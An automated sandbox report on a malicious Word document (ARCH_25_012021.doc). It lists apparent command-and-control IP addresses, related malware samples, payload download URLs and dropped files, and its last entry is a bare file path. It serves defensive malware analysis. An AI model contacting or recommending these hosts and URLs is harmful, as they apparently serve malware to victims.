                                            		unknownunknowntrue
                                            192.175.111.212:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            91.233.197.70:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            94.23.45.86:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            81.4.105.175:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            93.146.143.191:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            93.149.120.214:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            212.71.237.140:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            46.101.58.37:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            181.30.61.163:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            206.189.232.2:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            181.10.46.92:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            213.52.74.198:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            87.106.253.248:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            217.160.169.110
                                            		unknownGermany
                                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                            51.255.203.164
                                            		unknownFrance
                                            		16276OVHFRtrue
                                            191.223.36.170:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            186.177.174.163:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            217.13.106.14:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            138.97.60.141:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            201.185.69.28:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            45.16.226.117:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            82.208.146.142:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            192.169.223.13
                                            		unknownUnited States
                                            		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                            1.226.84.243:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            84.232.229.24
                                            		unknownRomania
                                            		8708RCS-RDS73-75DrStaicoviciROtrue
                                            70.32.115.157:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            217.160.169.110:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            85.105.239.184:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            152.170.79.100:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            143.0.85.206:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            51.255.203.164:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            94.176.234.118:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            50.28.51.143:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            185.94.252.27:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            31.27.59.105:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            197.232.36.108:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            190.45.24.210:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            185.183.16.47:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            190.24.243.186:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            190.64.88.186:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            82.48.39.246:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            191.241.233.198:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            170.81.48.2:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            172.245.248.239:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            154.127.113.242:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            95.76.153.115:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            211.215.18.93:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            80.249.176.206:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            110.39.160.38:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            185.183.16.47
                                            		unknownSpain
                                            		201453AKIWIFIAKIWIFIEStrue
                                            137.74.106.111:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            5.196.35.138:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            46.43.2.95:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            188.135.15.49:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            177.23.7.151:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            68.183.190.199:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            201.48.121.65:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            105.209.235.113:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            94.126.8.1:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            60.93.23.51:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            62.84.75.50:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            190.247.139.101:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            138.97.60.140:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            177.85.167.10:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            172.104.169.32:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            51.255.165.160:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            209.33.120.130:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            149.202.72.142:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            12.163.208.58:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            84.232.229.24:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            81.17.93.134:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            152.231.89.226:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            87.106.46.107:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            78.206.229.130:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            202.134.4.210:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            51.38.124.206:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            187.162.248.237:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            152.169.22.67:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            12.162.84.2:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            190.162.232.138:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            122.201.23.45:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            109.101.137.162:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            85.214.26.7:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            116.125.120.88:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            188.225.32.231:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            104.130.154.83:7080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            190.251.216.100:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            104.131.41.185:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            80.15.100.37:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            81.215.230.173:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            149.62.173.247:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            167.71.148.58:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            46.105.114.137:8080
                                            		unknownunknown
                                            		unknownunknowntrue
                                            110.39.162.2:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            190.210.246.253:80
                                            		unknownunknown
                                            		unknownunknowntrue
                                            81.214.253.80:443
                                            		unknownunknown
                                            		unknownunknowntrue
                                            138.197.99.250:8080
                                            		unknownunknown
                                            		unknownunknowntrue

                                            General Information

                                            Joe Sandbox Version:31.0.0 Emerald
                                            Analysis ID:344852
                                            Start date:27.01.2021
                                            Start time:09:29:42
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 51s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:ARCH_25_012021.doc
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • GSI enabled (VBA)
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winDOC@24/8@1/98
                                            EGA Information:
                                            • Successful, ratio: 88.9%
                                            HDC Information:
                                            • Successful, ratio: 8.7% (good quality ratio 6.4%)
                                            • Quality average: 59.1%
                                            • Quality standard deviation: 37.6%
                                            HCA Information:Failed
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .doc
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Found warning dialog
                                            • Click Ok
                                            • Attach to Office via COM
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                            • TCP Packets have been reduced to 100
                                            • Execution Graph export aborted for target powershell.exe, PID 1552 because it is empty
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            09:30:37API Interceptor1x Sleep call for process: msg.exe modified
                                            09:30:38API Interceptor64x Sleep call for process: powershell.exe modified
                                            09:30:47API Interceptor281x Sleep call for process: rundll32.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            217.160.169.110Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                            • 217.160.169.110:8080/zrm2/7son14/mlqmfbi2uji6/
                                            51.255.203.164ARCH_25_012021.docGet hashmaliciousBrowse
                                              Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                192.169.223.13ARCH_25_012021.docGet hashmaliciousBrowse
                                                • shannared.com/content/lhALeS/
                                                Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                • shannared.com/content/lhALeS/
                                                Notice 8283393_829.docGet hashmaliciousBrowse
                                                • shannared.com/content/lhALeS/
                                                MPbBCArHPF.exeGet hashmaliciousBrowse
                                                • www.zante2020.com/de92/?ofutZl=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&00GP-0=Lho4HDB0q2fdJ
                                                5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                • www.zante2020.com/de92/?FdC4E2D=LJRLKBSy6grrtpsJhG02GrYQIWz0ACN12l1WS7OpcnRH7cIC7TbO0nH4HvapdKvK3MkbU2/Law==&AjR=9r4L1
                                                DEBIT NOTE_ PZU000147200.exeGet hashmaliciousBrowse
                                                • www.signpartnerpro.com/6bu2/?ElS=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&Qtr=KnSlEX8p2LY
                                                SWIFT USD 354,883.00.exeGet hashmaliciousBrowse
                                                • www.signpartnerpro.com/6bu2/?DjU4Hl=gbG8jNk0zBv&YL0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D
                                                SAWR000148651.exeGet hashmaliciousBrowse
                                                • www.signpartnerpro.com/6bu2/?u6u0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAze2ZVQx+R2D&9r4l2=xPJtQXiX
                                                DEBIT NOTE-1C017A.exeGet hashmaliciousBrowse
                                                • www.signpartnerpro.com/6bu2/?Cjs0=pIawxknhA/x3iGgqSJRsJvWuUxDt6kQ0R9chtM/ozeyo8k7l8c2+ENgTAzecGlgx6T+D&al4=aV50jnQxv4qp0f
                                                Unode.exeGet hashmaliciousBrowse
                                                • www.electwatman.com/gtb/?t6A8=BSvxnM/FatY3MVaHvUsc2bSEp39whkHRVvBzdyZiJhALHrd8voDBQHL8OFVR1zdRJwYw&9r4l2=xPGHVlS8
                                                http://ambiancemedicalspa.com/application/orcle.phpGet hashmaliciousBrowse
                                                • ambiancemedicalspa.com/application/favicon.ico

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                shannared.comArch_2021_717-1562532.docGet hashmaliciousBrowse
                                                • 192.169.223.13
                                                Notice 8283393_829.docGet hashmaliciousBrowse
                                                • 192.169.223.13

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                OVHFRInvoice-3990993.exeGet hashmaliciousBrowse
                                                • 66.70.204.222
                                                ra8tqy1c.rar.dllGet hashmaliciousBrowse
                                                • 158.69.118.130
                                                ARCH_25_012021.docGet hashmaliciousBrowse
                                                • 51.255.203.164
                                                WUHU95Apq3Get hashmaliciousBrowse
                                                • 46.105.5.118
                                                SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                                • 158.69.118.130
                                                SecuriteInfo.com.Generic.mg.59d4c719403b7938.dllGet hashmaliciousBrowse
                                                • 158.69.118.130
                                                SecuriteInfo.com.Generic.mg.9d9c1d19818e75cc.dllGet hashmaliciousBrowse
                                                • 158.69.118.130
                                                SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                                • 158.69.118.130
                                                SecuriteInfo.com.ArtemisTrojan.dllGet hashmaliciousBrowse
                                                • 158.69.118.130
                                                roboforex4multisetup.exeGet hashmaliciousBrowse
                                                • 139.99.148.202
                                                xDKOaCQQTQ.dllGet hashmaliciousBrowse
                                                • 158.69.118.130
                                                4bEUfowOcg.dllGet hashmaliciousBrowse
                                                • 158.69.118.130
                                                P_O INV 01262021.exeGet hashmaliciousBrowse
                                                • 51.195.53.221
                                                DHL doc.exeGet hashmaliciousBrowse
                                                • 51.195.53.221
                                                PL5CS6pwNitND2n.exeGet hashmaliciousBrowse
                                                • 51.75.130.83
                                                Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                • 51.255.203.164
                                                PARTS REQUEST SO_30005141.exeGet hashmaliciousBrowse
                                                • 66.70.204.222
                                                Document_PDF.exeGet hashmaliciousBrowse
                                                • 51.195.53.221
                                                SecuriteInfo.com.Variant.Zusy.363976.21086.exeGet hashmaliciousBrowse
                                                • 54.39.198.228
                                                ARCH 05 2_80074.docGet hashmaliciousBrowse
                                                • 144.217.190.240
                                                RCS-RDS73-75DrStaicoviciROARCH_25_012021.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                bin.shGet hashmaliciousBrowse
                                                • 5.14.105.137
                                                Notice 8283393_829.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                MENSAJE.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                MENSAJE.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                MES-2021_01_22-3943960.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                Documento 2201 01279.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                DATI 2021.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                informazioni 536-32772764.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                Meddelelse-58931636.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                doc_2201_3608432.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                13-2021.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                MAIL-224201 277769577.docGet hashmaliciousBrowse
                                                • 84.232.229.24
                                                Arch_05_222-3139.docGet hashmaliciousBrowse
                                                • 5.2.136.90
                                                MENSAJE 2021.docGet hashmaliciousBrowse
                                                • 5.2.136.90
                                                Documento_0501_012021.docGet hashmaliciousBrowse
                                                • 5.2.136.90
                                                Datos_019_9251.docGet hashmaliciousBrowse
                                                • 5.2.136.90
                                                document_84237-299265042.docGet hashmaliciousBrowse
                                                • 5.2.136.90
                                                ARCH-012021-21-1934.docGet hashmaliciousBrowse
                                                • 5.2.136.90
                                                AS-26496-GO-DADDY-COM-LLCUSRAPID SOA.xlsxGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                0113 INV_PAK.xlsxGet hashmaliciousBrowse
                                                • 166.62.29.42
                                                quote20210126.exe.exeGet hashmaliciousBrowse
                                                • 107.180.2.197
                                                ARCH_25_012021.docGet hashmaliciousBrowse
                                                • 192.169.223.13
                                                Informacion.docGet hashmaliciousBrowse
                                                • 166.62.10.32
                                                v07PSzmSp9.exeGet hashmaliciousBrowse
                                                • 198.71.232.3
                                                winlog(1).exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                win32.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                DAT.docGet hashmaliciousBrowse
                                                • 107.180.12.39
                                                order pdf.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                • 192.169.223.13
                                                ARCH_98_24301.docGet hashmaliciousBrowse
                                                • 198.71.233.150
                                                RFQ.xlsxGet hashmaliciousBrowse
                                                • 198.71.232.3
                                                bgJPIZIYby.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                E4Q30tDEB9.exeGet hashmaliciousBrowse
                                                • 192.169.220.85
                                                RevisedPO.24488_pdf.exeGet hashmaliciousBrowse
                                                • 107.180.34.198
                                                02131.docGet hashmaliciousBrowse
                                                • 166.62.28.133
                                                mensaje_012021_1-538086.docGet hashmaliciousBrowse
                                                • 198.71.233.47
                                                Notice 8283393_829.docGet hashmaliciousBrowse
                                                • 192.169.223.13
                                                message_zdm.htmlGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                ONEANDONE-ASBrauerstrasse48DEARCH_25_012021.docGet hashmaliciousBrowse
                                                • 217.160.169.110
                                                justifiI_0000445990_0009334372_1005_2555517182_30092019_E.WsFGet hashmaliciousBrowse
                                                • 82.223.25.82
                                                JUSTF2.tarGet hashmaliciousBrowse
                                                • 213.165.67.118
                                                NEW ORDER.xlsxGet hashmaliciousBrowse
                                                • 74.208.236.196
                                                file.docGet hashmaliciousBrowse
                                                • 212.227.200.73
                                                winlog(1).exeGet hashmaliciousBrowse
                                                • 74.208.236.196
                                                Quote Requirements.gz.exeGet hashmaliciousBrowse
                                                • 70.35.203.53
                                                RFQ.xlsxGet hashmaliciousBrowse
                                                • 70.35.203.53
                                                Arch_2021_717-1562532.docGet hashmaliciousBrowse
                                                • 217.160.169.110
                                                Bestellung.docGet hashmaliciousBrowse
                                                • 212.227.200.73
                                                N00048481397007.docGet hashmaliciousBrowse
                                                • 212.227.200.73
                                                N00048481397007.docGet hashmaliciousBrowse
                                                • 212.227.200.73
                                                MENSAJE.docGet hashmaliciousBrowse
                                                • 212.227.200.73
                                                MENSAJE.docGet hashmaliciousBrowse
                                                • 212.227.200.73
                                                Archivo_AB-96114571.docGet hashmaliciousBrowse
                                                • 212.227.200.73
                                                5390080_2021_1-259043.docGet hashmaliciousBrowse
                                                • 212.227.200.73
                                                5390080_2021_1-259043.docGet hashmaliciousBrowse
                                                • 212.227.200.73
                                                GV52H7XsQ2.exeGet hashmaliciousBrowse
                                                • 217.76.142.246
                                                Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                • 74.208.236.161
                                                13-2021.docGet hashmaliciousBrowse
                                                • 88.208.252.128

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                C:\Users\user\Kaktksw\An6othh\N49I.dllARCH_25_012021.docGet hashmaliciousBrowse
                                                  Arch_2021_717-1562532.docGet hashmaliciousBrowse

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07E7EB5-D643-47FF-B622-0CF30ED55516}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E3935BE2-A796-4096-8B6B-C6BCF64E2588}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1536
                                                    Entropy (8bit):1.355309574382354
                                                    Encrypted:false
                                                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbe:IiiiiiiiiifdLloZQc8++lsJe1Mzx
                                                    MD5:B6B5BAF66D24A013A181E73F18CAB748
                                                    SHA1:B7A5BA97AB20478F0E4D5E6DCAC864208F2403BD
                                                    SHA-256:717C635B3416856BBC33233CCD388B72CC4F216621D929E7DC580D72B79798D0
                                                    SHA-512:B059D7B664E25550072ADFB4763C114F1F12313250DAA645082F5F4DBF159FF12FFF300F66CE551768340C9FE90FC0A3C488C25551B84831D5669D2FFA657154
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ARCH_25_012021.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Jan 27 16:30:34 2021, length=175616, window=hide
                                                    Category:dropped
                                                    Size (bytes):2068
                                                    Entropy (8bit):4.523631563965507
                                                    Encrypted:false
                                                    SSDEEP:48:8F/XT3IkHVnj3HJQh2F/XT3IkHVnj3HJQ/:8F/XLIkHVzJQh2F/XLIkHVzJQ/
                                                    MD5:AA3B7DF3EB16E1412DA0F6CD651990E1
                                                    SHA1:7EF784E4F5180B90B12AF7270D6CFA2DDB9A4D52
                                                    SHA-256:5416F79079A05BCD1A8987F9990B6860972D0B5D416063F3B22E64C63C856F0A
                                                    SHA-512:425536BD470209E431FDD435F71A0B811F609DA29E58D09FC6CEE1AE85978C5A2277730CE0BC79EC0938849FE71351C4061784500FA488493F12CE7676104B44
                                                    Malicious:false
                                                    Preview: L..................F.... .....J..{....J..{..F....................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....;R. .ARCH_2~1.DOC..R.......Q.y.Q.y*...8.....................A.R.C.H._.2.5._.0.1.2.0.2.1...d.o.c.......|...............-...8...[............?J......C:\Users\..#...................\\124406\Users.user\Desktop\ARCH_25_012021.doc.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.R.C.H._.2.5._.0.1.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......124406..........D_....3N...W...9F.C...........[D_
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):80
                                                    Entropy (8bit):4.211348644823317
                                                    Encrypted:false
                                                    SSDEEP:3:M1+qbl8WdblmX1+qblv:M4qbrdbPqb1
                                                    MD5:EF242110122D8695A53B38974D63C306
                                                    SHA1:F74EF8F7E90EF2B664F03FC482D2F1526159AC48
                                                    SHA-256:320FBB51CEDFAE2FA1371AAD0622E8A5333C66EBE13A89A21B19789A0739B236
                                                    SHA-512:B2AE3AEC71C0575957AA19EC1A9BE9DE587D7E3DF8345129972B98873B028512FE1CA0C31893FB589ACC12235CBA451563E66B6B2AFD00908074C4D0C79C7C8A
                                                    Malicious:false
                                                    Preview: [doc]..ARCH_25_012021.LNK=0..ARCH_25_012021.LNK=0..[doc]..ARCH_25_012021.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.431160061181642
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                    Malicious:false
                                                    Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UXL3RQT94R3A0BC61R7X.temp
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):8016
                                                    Entropy (8bit):3.587077696978234
                                                    Encrypted:false
                                                    SSDEEP:96:chQCsMqZqvsqvJCwo7z8hQCsMqZqvsEHyqvJCworpzkKYyHYf8R8lUVVIu:cywo7z8yMHnorpzkXf8RdIu
                                                    MD5:2AFCC6ACCB87C1228DEA47C66ABE1379
                                                    SHA1:E31078085D680E885A403812F3BB51403F7398FA
                                                    SHA-256:44B271339E3D7B9CC739669C9AA6F27278FED1F62FFD7AD4AD29A6DB5B3D585F
                                                    SHA-512:77AB9925B07272BCEE77B6108ED06957975DD19886CEB3CEE2A885B59F9FE130A324B017D43FE6F4B7D1E2C0ABAB2265DA292050C3B7CCF79C4729648D0897BB
                                                    Malicious:false
                                                    Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                    C:\Users\user\Desktop\~$CH_25_012021.doc
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.431160061181642
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                                    MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                                    SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                                    SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                                    SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                                    Malicious:false
                                                    Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                                    C:\Users\user\Kaktksw\An6othh\N49I.dll
